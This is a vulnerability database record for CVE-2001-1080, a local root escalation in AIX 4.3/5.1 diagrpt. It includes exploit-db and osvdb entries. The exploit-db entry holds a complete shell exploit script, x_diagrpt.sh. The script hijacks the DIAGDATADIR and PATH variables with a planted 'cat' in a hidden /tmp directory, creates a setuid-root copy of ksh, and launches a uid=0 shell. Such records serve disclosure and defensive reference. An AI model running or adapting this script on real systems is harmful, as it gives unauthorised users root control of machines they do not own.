ID: CVE-2001-1080
Type: cve
Reporter: cve@mitre.org
Modified: 2017-10-10T01:29:00
Description
diagrpt in AIX 4.3.x and 5.1 uses the DIAGDATADIR environment variable to find and execute certain programs, which allows local users to gain privileges by modifying the variable to point to a Trojan horse program.
{
  "exploitdb": [
    {
      "lastseen": "2016-02-02T15:22:45",
      "description": "AIX 4.3/5.1 diagrpt Arbitrary Privileged Program Execution Vulnerability. CVE-2001-1080. Local exploit for aix platform",
      "published": "2003-05-23T00:00:00",
      "type": "exploitdb",
      "title": "AIX 4.3/5.1 - diagrpt Arbitrary Privileged Program Execution Vulnerability",
      "bulletinFamily": "exploit",
      "cvelist": ["CVE-2001-1080"],
      "modified": "2003-05-23T00:00:00",
      "id": "EDB-ID:20965",
      "href": "https://www.exploit-db.com/exploits/20965/",
      "sourceData": "source: http://www.securityfocus.com/bid/2916/info\r\n\r\nAIX ships with a diagnostic reporting utility called 'diagrpt'. This utility is installed setuid root by default.\r\n\r\nWhen 'diagrpt' executes, it relies on an environment variable to locate another utility which it executes. This utility is executed by 'diagrpt' as root.\r\n\r\nAn attacker can gain root privileges by having 'diagrpt' execute a malicious program of the same name in a directory under their control. \r\n\r\n#!/bin/sh\r\n# FileName: x_diagrpt.sh\r\n# Exploit diagrpt of Aix4.x & 5L to get a uid=0 shell.\r\n# Tested : on Aix4.3.3 & Aix5.1.\r\n# Author : watercloud@xfocus.org\r\n# Site : www.xfocus.org www.xfocus.net\r\n# Date : 2003-5-23\r\n# Announce: use as your owner risk!\r\n#\r\n# Note :\r\n# It does not work on all versions of tsm command.\r\n# Use this command to test if your version can exploit or not :\r\n# bash$ strings /usr/lpp/diagnostics/bin/diagrpt |grep cat\r\n# diagrpt.cat\r\n# cat %s <--- here ! have the bug !!! can exploit!\r\n#\r\n\r\nO_DIR=`/bin/pwd`\r\ncd /tmp ; mkdir .ex$$ ; cd .ex$$\r\nPATH=/tmp/.ex$$:$PATH ; export PATH\r\n/bin/cat >cat<<EOF\r\n#!/bin/ksh -p\r\ncp /bin/ksh ./kfsh\r\nchown root ./kfsh\r\nchmod 777 ./kfsh\r\nchmod u+s ./kfsh\r\nEOF\r\nchmod a+x cat\r\n\r\nDIAGDATADIR=/tmp/.ex$$ ; export DIAGDATADIR\r\ntouch /tmp/.ex$$/diagrpt1.dat\r\n\r\n/usr/lpp/diagnostics/bin/diagrpt -o 010101\r\nstty echo\r\nstty intr '^C' erase '^H' eof '^D' eol '^@'\r\n\r\nif [ -e ./kfsh ] ;then\r\n echo \"\"\r\n echo \"====================\"\r\n pwd\r\n ls -l ./kfsh\r\n echo \"Exploit ok ! Use this command to get a uid=0 shell :\"\r\n echo '/usr/bin/syscall setreuid 0 0 \\; execve \"/bin/sh\" '\r\n ./kfsh\r\nelse\r\n echo \"\"\r\n echo \"Exploit false !!!!\"\r\nfi\r\n\r\ncd /tmp ; /bin/rm -Rf /tmp/.ex$$ ;cd $O_DIR\r\n#EOF\r\n",
      "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"},
      "sourceHref": "https://www.exploit-db.com/download/20965/"
    }
  ],
  "osvdb": [
    {
      "lastseen": "2017-04-28T13:19:56",
      "bulletinFamily": "software",
      "cvelist": ["CVE-2001-1080"],
      "edition": 1,
      "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 6734\n[CVE-2001-1080](https://vulners.com/cve/CVE-2001-1080)\nBugtraq ID: 2916\n",
      "modified": "2001-06-22T00:00:00",
      "published": "2001-06-22T00:00:00",
      "href": "https://vulners.com/osvdb/OSVDB:1881",
      "id": "OSVDB:1881",
      "type": "osvdb",
      "title": "AIX diagrpt Arbitrary Privileged Program Execution",
      "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}
    }
  ]
}